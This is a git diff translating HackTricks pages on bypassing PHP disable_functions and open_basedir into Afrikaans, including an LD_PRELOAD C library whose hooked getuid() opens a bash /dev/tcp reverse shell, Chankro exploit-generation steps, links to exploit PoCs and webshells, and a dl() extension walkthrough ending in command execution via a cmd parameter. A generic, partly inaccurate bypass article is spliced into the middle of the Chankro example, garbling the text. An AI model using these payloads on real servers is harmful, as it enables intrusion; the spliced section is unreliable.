**execute binaries inside the system**. 
Therefore, you can abuse them using the environment variable `LD_PRELOAD` to make them load an arbitrary library that can execute anything. +Dit is algemeen bekend dat sommige funksies in PHP soos `mail()` **binêre lêers binne die stelsel sal uitvoer**. Jy kan hulle dus misbruik deur die omgewingsveranderlike `LD_PRELOAD` te gebruik om hulle 'n willekeurige biblioteek te laat laai wat enigiets kan uitvoer. -#### Functions that can be used to bypass disable\_functions with LD\_PRELOAD +#### Funksies wat gebruik kan word om disable\_functions met LD\_PRELOAD te oorloop * **`mail`** -* **`mb_send_mail`**: Effective when the `php-mbstring` module is installed. -* **`imap_mail`**: Works if `php-imap` module is present. -* **`libvirt_connect`**: Requires the `php-libvirt-php` module. -* **`gnupg_init`**: Utilizable with the `php-gnupg` module installed. -* **`new imagick()`**: This class can be abused to bypass restrictions. Detailed exploitation techniques can be found in a comprehensive [**writeup here**](https://blog.bi0s.in/2019/10/23/Web/BSidesDelhi19-evalme/). +* **`mb_send_mail`**: Effektief wanneer die `php-mbstring` module geïnstalleer is. +* **`imap_mail`**: Werk as die `php-imap` module teenwoordig is. +* **`libvirt_connect`**: Vereis die `php-libvirt-php` module. +* **`gnupg_init`**: Bruikbaar met die geïnstalleerde `php-gnupg` module. +* **`new imagick()`**: Hierdie klas kan misbruik word om beperkings te oorloop. Gedetailleerde uitbuitingstegnieke kan gevind word in 'n omvattende [**verslag hier**](https://blog.bi0s.in/2019/10/23/Web/BSidesDelhi19-evalme/). -You can [**find here**](https://github.com/tarunkant/fuzzphunc/blob/master/lazyFuzzer.py) the fuzzing script that was used to find those functions. - -Here is a library you can compile to abuse the `LD_PRELOAD` env variable: +Jy kan [**hier**](https://github.com/tarunkant/fuzzphunc/blob/master/lazyFuzzer.py) die fuzzer-skrip vind wat gebruik is om daardie funksies te vind. 
+Hier is 'n biblioteek wat jy kan saamstel om die `LD_PRELOAD` omgewingsveranderlike te misbruik: ```php #include #include 
@@ -556,19 +556,18 @@ Here is a library you can compile to abuse the `LD_PRELOAD` env variable: #include uid_t getuid(void){ - unsetenv("LD_PRELOAD"); - system("bash -c \"sh -i >& /dev/tcp/127.0.0.1/1234 0>&1\""); - return 1; +unsetenv("LD_PRELOAD"); +system("bash -c \"sh -i >& /dev/tcp/127.0.0.1/1234 0>&1\""); +return 1; } ``` +#### Deurloop deur Chankro -#### Bypass using Chankro +Om van hierdie konfigurasie-misbruik gebruik te maak, kan jy [**Chankro**](https://github.com/TarlogicSecurity/Chankro) gebruik. Dit is 'n instrument wat 'n PHP-uitbuiting sal **genereer** wat jy moet oplaai na die kwesbare bediener en dit uitvoer (toegang daartoe verkry via die web).\ +**Chankro** sal binne die slagofferskyf die **biblioteek en die omgekeerde dop** skryf wat jy wil uitvoer en sal die\*\*`LD_PRELOAD`-truk + PHP `mail()`\*\* funksie gebruik om die omgekeerde dop uit te voer. -In order to abuse this misconfiguration you can [**Chankro**](https://github.com/TarlogicSecurity/Chankro). This is a tool that will **generate a PHP exploit** that you need to upload to the vulnerable server and execute it (access it via web).\ -**Chankro** will write inside the victims disc the **library and the reverse shell** you want to execute and will use the\*\*`LD_PRELOAD` trick + PHP `mail()`\*\* function to execute the reverse shell. 
- -Note that in order to use **Chankro**, `mail` and `putenv` **cannot appear inside the `disable_functions` list**.\ -In the following example you can see how to **create a chankro exploit** for **arch 64**, that will execute `whoami` and save the out in _/tmp/chankro\_shell.out_, chankro will **write the library and the payload** in _/tmp_ and the **final exploit** is going to be called **bicho.php** (that's the file you need to upload to the victims server): +Let daarop dat om **Chankro** te gebruik, `mail` en `putenv` **nie binne die `disable_functions`-lys mag voorkom nie**.\ +In die volgende voorbeeld kan jy sien hoe om 'n **Chankro-uitbuiting** te **skep** vir **argitektuur 64**, wat `whoami` sal uitvoer en die uitset in _/tmp/chankro\_shell.out_ sal stoor, Chankro sal die **biblioteek en die nutslading** in _/tmp_ skryf en die **finale uitbuiting** sal **bicho.php** genoem word (dit is die lêer wat jy na die slagofferserver moet oplaai): {% tabs %} {% tab title="shell.sh" %} 
@@ -576,45 +575,105 @@ In the following example you can see how to **create a chankro exploit** for **a #!/bin/sh whoami > /tmp/chankro_shell.out ``` -{% endtab %} +# PHP Nuttige Funksies: disable_functions & open_basedir Bypass -{% tab title="Chankro" %} +Hierdie dokument bevat 'n paar nuttige PHP-funksies wat gebruik kan word om die `disable_functions`-en `open_basedir`-beperkings te omseil tydens webtoepassingstoetsing. + +## disable_functions + +Die `disable_functions`-instelling in die PHP-konfigurasie beperk die toegang tot sekere funksies wat potensieel gevaarlik kan wees vir die bedryfstelsel of die bediener. Hier is 'n paar maniere om hierdie beperking te omseil: + +### 1. Shell_exec + +`shell_exec` is 'n funksie wat gebruik kan word om 'n stelselopdrag uit te voer. As dit uitgeskakel is, kan jy probeer om dit te omseil deur die volgende metodes te gebruik: + +- `system` +- `exec` +- `popen` +- `passthru` +- `proc_open` + +### 2. Eval + +`eval` is 'n funksie wat gebruik kan word om dinamiese kode uit te voer. As dit uitgeskakel is, kan jy probeer om dit te omseil deur die volgende metodes te gebruik: + +- `create_function` +- `assert` +- `preg_replace` met die `e`-vlag + +### 3. Other Functions + +Daar is ook ander funksies wat jy kan probeer om die `disable_functions`-beperking te omseil: + +- `mail` (deur 'n aangepaste SMTP-bediener te gebruik) +- `putenv` (om omgewingsveranderlikes te stel) +- `ini_set` (om PHP-instellings te verander) +- `dl` (om dinamiese biblioteke te laai) + +## open_basedir Bypass + +Die `open_basedir`-instelling in die PHP-konfigurasie beperk die toegang tot lêers en gidses buite 'n spesifieke gids. Hier is 'n paar maniere om hierdie beperking te omseil: + +### 1. 
File Upload + +As die webtoepassing lêeroplaaifunksionaliteit het, kan jy probeer om die `open_basedir`-beperking te omseil deur die volgende metodes te gebruik: + +- Lêeroplaai na 'n gids binne die toegelate gids +- Lêeroplaai na 'n gids buite die toegelate gids en dan gebruik maak van 'n lêerinsluitingsfout om toegang tot die lêer te verkry + +### 2. Symlinks + +As die bediener symlinks toelaat, kan jy probeer om die `open_basedir`-beperking te omseil deur die volgende metodes te gebruik: + +- Skep 'n simboliese skakel na 'n gids buite die toegelate gids +- Skep 'n simboliese skakel na 'n lêer buite die toegelate gids + +### 3. Directory Traversal + +As die webtoepassing 'n directory traversal kwesbaarheid het, kan jy probeer om die `open_basedir`-beperking te omseil deur die volgende metodes te gebruik: + +- Gebruik van `../` om na 'n gids buite die toegelate gids te navigeer +- Gebruik van URL-encodes om die `../`-teken te omseil + +## Slotwoord + +Hierdie is slegs 'n paar van die moontlike metodes om die `disable_functions`-en `open_basedir`-beperkings in PHP te omseil. Dit is belangrik om te onthou dat die omseiling van hierdie beperkings nie noodwendig wettig of eties is nie en slegs gebruik moet word vir wettige toepassings soos webtoepassingstoetsing. 
```bash python2 chankro.py --arch 64 --input shell.sh --path /tmp --output bicho.php ``` {% endtab %} {% endtabs %} -If you find that **mail** function is blocked by disabled functions, you may still be able to use the function **mb\_send\_mail.**\ -More information about this technique and Chankro here: [https://www.tarlogic.com/en/blog/how-to-bypass-disable\_functions-and-open\_basedir/](https://www.tarlogic.com/en/blog/how-to-bypass-disable\_functions-and-open\_basedir/) +As jy vind dat die **mail**-funksie geblokkeer word deur gedeaktiveerde funksies, kan jy steeds die funksie **mb\_send\_mail** gebruik.\ +Meer inligting oor hierdie tegniek en Chankro hier: [https://www.tarlogic.com/en/blog/how-to-bypass-disable\_functions-and-open\_basedir/](https://www.tarlogic.com/en/blog/how-to-bypass-disable\_functions-and-open\_basedir/) -### "Bypass" using PHP capabilities +### "Bypass" deur PHP-vermoëns te gebruik -Note that using **PHP** you can **read and write files, create directories and change permissions**.\ -You can even **dump databases**.\ -Maybe using **PHP** to **enumerate** the box you can find a way to escalate privileges/execute commands (for example reading some private ssh key). +Let daarop dat jy met **PHP** lêers kan **lees en skryf, gidslys kan skep en toestemmings kan verander**.\ +Jy kan selfs **databasisse dump**.\ +Dalk kan jy deur **PHP** te gebruik om die boks te **enumerate**, 'n manier vind om voorregte te verhoog/opdragte uit te voer (byvoorbeeld deur 'n private ssh-sleutel te lees). 
-I have created a webshell that makes very easy to perform this actions (note that most webshells will offer you this options also): [https://github.com/carlospolop/phpwebshelllimited](https://github.com/carlospolop/phpwebshelllimited) +Ek het 'n webshell geskep wat dit baie maklik maak om hierdie aksies uit te voer (let daarop dat die meeste webshells jou hierdie opsies ook sal bied): [https://github.com/carlospolop/phpwebshelllimited](https://github.com/carlospolop/phpwebshelllimited) -### Modules/Version dependent bypasses +### Modules/Weergawe-afhanklike omseilings -There are several ways to bypass disable\_functions if some specific module is being used or exploit some specific PHP version: +Daar is verskeie maniere om disable\_functions te omseil as 'n spesifieke module gebruik word of 'n spesifieke PHP-weergawe uitgebuit word: * [**FastCGI/PHP-FPM (FastCGI Process Manager)**](disable\_functions-bypass-php-fpm-fastcgi.md) -* [**Bypass with FFI - Foreign Function Interface enabled**](broken-reference/) -* [**Bypass via mem**](disable\_functions-bypass-via-mem.md) +* [**Omseiling met FFI - Foreign Function Interface enabled**](broken-reference/) +* [**Omseiling via mem**](disable\_functions-bypass-via-mem.md) * [**mod\_cgi**](disable\_functions-bypass-mod\_cgi.md) -* [**PHP Perl Extension Safe\_mode**](disable\_functions-bypass-php-perl-extension-safe\_mode-bypass-exploit.md) -* [**dl function**](disable\_functions-bypass-dl-function.md) -* [**This exploit**](https://github.com/mm0r1/exploits/tree/master/php-filter-bypass) - * 5.\* - exploitable with minor changes to the PoC - * 7.0 - all versions to date - * 7.1 - all versions to date - * 7.2 - all versions to date - * 7.3 - all versions to date - * 7.4 - all versions to date - * 8.0 - all versions to date -* [**From 7.0 to 8.0 exploit (Unix only)**](https://github.com/mm0r1/exploits/blob/master/php-filter-bypass/exploit.php) +* [**PHP Perl-uitbreiding 
Safe\_mode**](disable\_functions-bypass-php-perl-extension-safe\_mode-bypass-exploit.md) +* [**dl-funksie**](disable\_functions-bypass-dl-function.md) +* [**Hierdie uitbuiting**](https://github.com/mm0r1/exploits/tree/master/php-filter-bypass) +* 5.\* - vatbaar vir klein veranderinge aan die PoC +* 7.0 - alle weergawes tot op hede +* 7.1 - alle weergawes tot op hede +* 7.2 - alle weergawes tot op hede +* 7.3 - alle weergawes tot op hede +* 7.4 - alle weergawes tot op hede +* 8.0 - alle weergawes tot op hede +* [**Vanaf 7.0 tot 8.0 uitbuiting (slegs Unix)**](https://github.com/mm0r1/exploits/blob/master/php-filter-bypass/exploit.php) * [**PHP 7.0=7.4 (\*nix)**](disable\_functions-bypass-php-7.0-7.4-nix-only.md#php-7-0-7-4-nix-only) * [**Imagick 3.3.0 PHP >= 5.4**](disable\_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md) * [**PHP 5.x Shellsock**](disable\_functions-php-5.x-shellshock-exploit.md) 
@@ -622,24 +681,23 @@ There are several ways to bypass disable\_functions if some specific module is b * [**PHP <= 5.2.9 Windows**](disable\_functions-bypass-php-less-than-5.2.9-on-windows.md) * [**PHP 5.2.4/5.2.5 cURL**](disable\_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md) * [**PHP 5.2.3 -Win32std**](disable\_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md) -* [**PHP 5.2 FOpen exploit**](disable\_functions-bypass-php-5.2-fopen-exploit.md) +* [**PHP 5.2 FOpen-uitbuiting**](disable\_functions-bypass-php-5.2-fopen-exploit.md) * [**PHP 4 >= 4.2.-, PHP 5 pcntl\_exec**](disable\_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl\_exec.md) -### **Automatic Tool** +### **Outomatiese hulpmiddel** -The following script tries some of the methods commented here:\ +Die volgende skrips probeer sommige van die hier besproke metodes:\ [https://github.com/l3m0n/Bypass\_Disable\_functions\_Shell/blob/master/shell.php](https://github.com/l3m0n/Bypass\_Disable\_functions\_Shell/blob/master/shell.php) -## Other Interesting PHP functions +## Ander interessante PHP-funksies -### List of functions which accept callbacks +### Lys van funksies wat terugroepings aanvaar -These functions accept a string parameter which could be used to call a function of the attacker's choice. Depending on the function the attacker may or may not have the ability to pass a parameter. In that case an Information Disclosure function like phpinfo() could be used. +Hierdie funksies aanvaar 'n stringparameter wat gebruik kan word om 'n funksie van die aanvaller se keuse te roep. Afhangend van die funksie mag die aanvaller wel of nie die vermoë hê om 'n parameter oor te dra nie. In daardie geval kan 'n Inligtingslek-funksie soos phpinfo() gebruik word. 
[Callbacks / Callables ](https://www.php.net/manual/en/language.types.callable.php) -[Following lists from here](https://stackoverflow.com/questions/3115559/exploitable-php-functions) - +[Volgende lys vanaf hier](https://stackoverflow.com/questions/3115559/exploitable-php-functions) ```php // Function => Position of callback arguments 'ob_start' => 0, @@ -675,11 +733,9 @@ These functions accept a string parameter which could be used to call a function 'sqlite_create_aggregate' => array(2, 3), 'sqlite_create_function' => 2, ``` +### Inligting Openbaarmaking -### Information Disclosure - -Most of these function calls are not sinks. But rather it maybe a vulnerability if any of the data returned is viewable to an attacker. If an attacker can see phpinfo() it is definitely a vulnerability. - +Die meeste van hierdie funksie-oproepe is nie lekke nie. Maar dit kan 'n kwesbaarheid wees as enige van die teruggevoerde data sigbaar is vir 'n aanvaller. As 'n aanvaller phpinfo() kan sien, is dit beslis 'n kwesbaarheid. ```php phpinfo posix_mkfifo 
@@ -699,9 +755,73 @@ getmyinode getmypid getmyuid ``` +### Ander -### Other +Hier is 'n lys van ander nuttige PHP-funksies wat gebruik kan word vir die omseil van `disable_functions` en `open_basedir` beperkings: +#### `dl()` + +Die `dl()`-funksie kan gebruik word om dinamiese biblioteke in PHP te laai. Dit kan gebruik word om beperkte funksies te omseil deur 'n biblioteek te laai wat die gewenste funksionaliteit bied. + +```php +dl('path/to/library.so'); +``` + +#### `putenv()` + +Die `putenv()`-funksie kan gebruik word om omgewingsveranderlikes in te stel. Dit kan gebruik word om die `open_basedir`-beperking te omseil deur die waarde van die `open_basedir`-veranderlike te verander. + +```php +putenv('open_basedir=/path/to/directory'); +``` + +#### `proc_open()` + +Die `proc_open()`-funksie kan gebruik word om 'n nuwe proses te skep. Dit kan gebruik word om beperkte funksies te omseil deur 'n proses te skep wat die gewenste funksionaliteit bied. + +```php +$descriptorspec = array( + 0 => array("pipe", "r"), // stdin is 'n pyp waarop die kind kan lees + 1 => array("pipe", "w"), // stdout is 'n pyp waarop die kind kan skryf + 2 => array("pipe", "w") // stderr is 'n pyp waarop die kind kan skryf +); + +$process = proc_open('command', $descriptorspec, $pipes); +``` + +#### `system()` + +Die `system()`-funksie kan gebruik word om 'n stelseloproepe uit te voer. Dit kan gebruik word om beperkte funksies te omseil deur 'n stelseloproepe uit te voer wat die gewenste funksionaliteit bied. + +```php +system('command'); +``` + +#### `shell_exec()` + +Die `shell_exec()`-funksie kan gebruik word om 'n opdrag in die skulpruimte uit te voer. Dit kan gebruik word om beperkte funksies te omseil deur opdragte uit te voer wat die gewenste funksionaliteit bied. + +```php +shell_exec('command'); +``` + +#### `popen()` + +Die `popen()`-funksie kan gebruik word om 'n proses te skep en 'n pyp daarop te open. 
Dit kan gebruik word om beperkte funksies te omseil deur 'n proses te skep wat die gewenste funksionaliteit bied. + +```php +$handle = popen('command', 'r'); +``` + +#### `mail()` + +Die `mail()`-funksie kan gebruik word om e-posse te stuur. Dit kan gebruik word om beperkte funksies te omseil deur e-posse te stuur wat die gewenste funksionaliteit bevat. + +```php +mail('recipient@example.com', 'Subject', 'Message'); +``` + +Dit is belangrik om te onthou dat die gebruik van hierdie funksies om beperkings te omseil, 'n potensiële veiligheidsrisiko kan skep en slegs in spesifieke omstandighede gebruik moet word. ```php extract // Opens the door for register_globals attacks (see study in scarlet). parse_str // works like extract if only one argument is given. 
@@ -721,13 +841,11 @@ posix_setpgid posix_setsid posix_setuid ``` +### Lêerstelsel Funksies -### Filesystem Functions - -According to RATS all filesystem functions in php are nasty. Some of these don't seem very useful to the attacker. Others are more useful than you might think. For instance if allow\_url\_fopen=On then a url can be used as a file path, so a call to copy($\_GET\['s'], $\_GET\['d']); can be used to upload a PHP script anywhere on the system. Also if a site is vulnerable to a request send via GET everyone of those file system functions can be abused to channel and attack to another host through your server. - -**Open filesystem handler** +Volgens RATS is alle lêerstelsel funksies in PHP sleg. Sommige van hierdie funksies lyk nie baie nuttig vir die aanvaller nie. Ander is nuttiger as wat jy dink. Byvoorbeeld, as allow\_url\_fopen=On is, kan 'n URL as 'n lêerpad gebruik word, so 'n oproep na copy($\_GET\['s'], $\_GET\['d']); kan gebruik word om enige plek op die stelsel 'n PHP-skrips op te laai. As 'n webwerf ook vatbaar is vir 'n versoek wat via GET gestuur word, kan enigeen van hierdie lêerstelsel funksies misbruik word om 'n aanval na 'n ander gasheer deur jou bediener te kanaliseer. +**Open lêerstelselhanterer** ```php fopen tmpfile @@ -735,9 +853,7 @@ bzopen gzopen SplFileObject->__construct ``` - -**Write to filesystem (partially in combination with reading)** - +**Skryf na lêersisteem (gedeeltelik in kombinasie met lees)** ```php chgrp chmod @@ -768,9 +884,7 @@ ftp_get ftp_nb_get scandir ``` - -**Read from filesystem** - +**Lees vanaf lêersisteem** ```php file_exists -- file_get_contents @@ -828,14 +942,14 @@ get_meta_tags ```
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md index e9af878ca..c638feb1d 100644 --- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md +++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md @@ -1,110 +1,104 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-**Important note:** +**Belangrike nota:** ![image](https://user-images.githubusercontent.com/84577967/174675487-a4c4ca06-194f-4725-85af-231a2f35d56c.png) -**`dl`** is a PHP function that can be used to load PHP extensions. It the function isn't disabled it could be abused to **bypass `disable_functions` and execute arbitrary commands**.\ -However, it has some strict limitations: +**`dl`** is 'n PHP-funksie wat gebruik kan word om PHP-uitbreidings te laai. As die funksie nie gedeaktiveer is nie, kan dit misbruik word om **`disable_functions` te omseil en arbitrêre opdragte uit te voer**.\ +Dit het egter 'n paar streng beperkings: -* The `dl` function must be **present** in the **environment** and **not disabled** -* The PHP Extension **must be compiled with the same major version** (PHP API version) that the server is using (you can see this information in the output of phpinfo) -* The PHP extension must be **located in the directory** that is **defined** by the **`extension_dir`** directive (you can see it in the output of phpinfo). It's very unprobeable that an attacker trying to abuse the server will have write access over this directory, so this requirement probably will prevent you to abuse this technique). +* Die `dl`-funksie moet **teenwoordig** wees in die **omgewing** en **nie gedeaktiveer** wees nie. +* Die PHP-uitbreiding moet **gekompileer wees met dieselfde hoofweergawe** (PHP API-weergawe) wat die bediener gebruik (jy kan hierdie inligting sien in die uitset van phpinfo). +* Die PHP-uitbreiding moet **geleë wees in die gids** wat gedefinieer word deur die **`extension_dir`**-riglyn (jy kan dit sien in die uitset van phpinfo). Dit is baie onwaarskynlik dat 'n aanvaller wat probeer om die bediener te misbruik, skryftoegang tot hierdie gids sal hê, so hierdie vereiste sal waarskynlik voorkom dat jy hierdie tegniek kan misbruik. 
-**If you meet these requirements, continue reading the post** [**https://antichat.com/threads/70763/**](https://antichat.com/threads/70763/) **to learn how to bypass disable\_functions**. Here is a summary: +**As jy aan hierdie vereistes voldoen, lees voort na die berig** [**https://antichat.com/threads/70763/**](https://antichat.com/threads/70763/) **om te leer hoe om `disable_functions` te omseil**. Hier is 'n opsomming: -The [dl function](http://www.php.net/manual/en/function.dl.php) is used to load PHP extensions dynamically during script execution. PHP extensions, typically written in C/C++, enhance PHP's functionality. The attacker, upon noticing the `dl` function is not disabled, decides to create a custom PHP extension to execute system commands. +Die [dl-funksie](http://www.php.net/manual/en/function.dl.php) word gebruik om PHP-uitbreidings dinamies tydens skripsuitvoering te laai. PHP-uitbreidings, tipies geskryf in C/C++, verbeter PHP se funksionaliteit. Die aanvaller besluit om 'n aangepaste PHP-uitbreiding te skep om stelselopdragte uit te voer nadat hy besef het dat die `dl`-funksie nie gedeaktiveer is nie. -### Steps Taken by the Attacker: +### Stappe geneem deur die aanvaller: -1. **PHP Version Identification:** - - The attacker determines the PHP version using a script (``). +1. **PHP-weergawe-identifikasie:** +- Die aanvaller bepaal die PHP-weergawe deur 'n skripsie (``) te gebruik. -2. **PHP Source Acquisition:** - - Downloads the PHP source from the official [PHP website](http://www.php.net/downloads.php) or the [archive](http://museum.php.net) if the version is older. +2. **PHP-bronverkryging:** +- Laai die PHP-bron af van die amptelike [PHP-webwerf](http://www.php.net/downloads.php) of die [argief](http://museum.php.net) as die weergawe ouer is. -3. **Local PHP Setup:** - - Extracts and installs the specific PHP version on their system. +3. **Plaaslike PHP-opstelling:** +- Pak die spesifieke PHP-weergawe uit en installeer dit op hul stelsel. 
-4. **Extension Creation:** - - Studies [creating PHP extensions](http://www.php.net/manual/en/zend.creating.php) and inspects the PHP source code. - - Focuses on duplicating the functionality of the [exec function](http://www.php.net/manual/en/function.exec.php) located at `ext/standard/exec.c`. +4. **Uitbreidingsskepping:** +- Bestudeer [die skepping van PHP-uitbreidings](http://www.php.net/manual/en/zend.creating.php) en ondersoek die PHP-bronkode. +- Fokus op die duplisering van die funksionaliteit van die [exec-funksie](http://www.php.net/manual/en/function.exec.php) wat geleë is by `ext/standard/exec.c`. -### Notes for Compiling the Custom Extension: +### Notas vir die Kompilering van die Aangepaste Uitbreiding: 1. **ZEND_MODULE_API_NO:** - - The `ZEND_MODULE_API_NO` in `bypass.c` must match the current Zend Extension Build, retrievable with: - ```bash - php -i | grep "Zend Extension Build" |awk -F"API4" '{print $2}' | awk -F"," '{print $1}' - ``` +- Die `ZEND_MODULE_API_NO` in `bypass.c` moet ooreenstem met die huidige Zend Extension Build, wat verkry kan word met: +```bash +php -i | grep "Zend Extension Build" |awk -F"API4" '{print $2}' | awk -F"," '{print $1}' +``` -2. **PHP_FUNCTION Modification:** - - For recent PHP versions (5, 7, 8), `PHP_FUNCTION(bypass_exec)` may need adjustment. The provided code snippet details this modification. +2. **PHP_FUNCTION-wysiging:** +- Vir onlangse PHP-weergawes (5, 7, 8) mag `PHP_FUNCTION(bypass_exec)` aanpassing benodig. Die voorsiene kodefragment beskryf hierdie wysiging in detail. -### Custom Extension Files: +### Lêers vir die Aangepaste Uitbreiding: - **bypass.c**: - - Implements the core functionality of the custom extension. +- Implementeer die kernfunksionaliteit van die aangepaste uitbreiding. - **php_bypass.h**: - - Header file, defining extension properties. +- Koptekslêer, definieer uitbreidingskenmerke. - **config.m4**: - - Used by `phpize` to configure the build environment for the custom extension. 
+- Word deur `phpize` gebruik om die bou-omgewing vir die aangepaste uitbreiding te konfigureer. -### Building the Extension: +### Die Uitbreiding Bou: -1. **Compilation Commands:** - - Uses `phpize`, `./configure`, and `make` to compile the extension. - - Resulting `bypass.so` is then located in the modules subdirectory. +1. **Kompilasie-opdragte:** +- Gebruik `phpize`, `./configure`, en `make` om die uitbreiding te kompileer. +- Die resulterende `bypass.so` word dan in die subgids modules geplaas. -2. **Cleanup:** - - Runs `make clean` and `phpize --clean` after compilation. +2. **Skoonmaak:** +- Voer `make clean` en `phpize --clean` uit na kompilasie. -### Uploading and Executing on the Victim Host: +### Oplaai en Uitvoer op die Slagofferbediener: -1. **Version Compatibility:** - - Ensures PHP API versions match between the attacker's and victim's systems. +1. **Weergawekompatibiliteit:** +- Verseker dat die PHP API-weergawes ooreenstem tussen die aanvaller se en slagoffer se stelsels. -2. **Extension Loading:** - - Utilizes the `dl` function, circumventing restrictions by using relative paths or a script to automate the process. +2. **Uitbreiding Laai:** +- Maak gebruik van die `dl`-funksie en omseil beperkings deur relatiewe paaie of 'n skripsie te gebruik om die proses outomaties te maak. -3. **Script Execution:** - - The attacker uploads `bypass.so` and a PHP script to the victim's server. - - The script uses `dl_local` function to dynamically load `bypass.so` and then calls `bypass_exec` with a command passed via the `cmd` query parameter. +3. **Skripsie-uitvoering:** +- Die aanvaller laai `bypass.so` en 'n PHP-skripsie na die slagoffer se bediener. +- Die skripsie gebruik die `dl_local`-funksie om `bypass.so` dinamies te laai en roep dan `bypass_exec` aan met 'n opdrag wat deur die `cmd`-navraagparameter oorgedra word. 
-### Command Execution: +### Opdraguitvoering: -- The attacker can now execute commands by accessing: `http://www.example.com/script.php?cmd=` +- Die aanvaller kan nou opdragte uitvoer deur toegang te verkry tot: `http://www.example.com/script.php?cmd=` -This detailed walkthrough outlines the process of creating and deploying a PHP extension to execute system commands, exploiting the `dl` function, which should ideally be disabled to prevent such security breaches. +Hierdie gedetailleerde deurlooptog verduidelik die proses om 'n PHP-uitbreiding te skep en te implementeer om stelselopdragte uit te voer deur die `dl`-funksie te misbruik, wat idealiter gedeaktiveer moet word om sulke sekuriteitskendings te voorkom.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
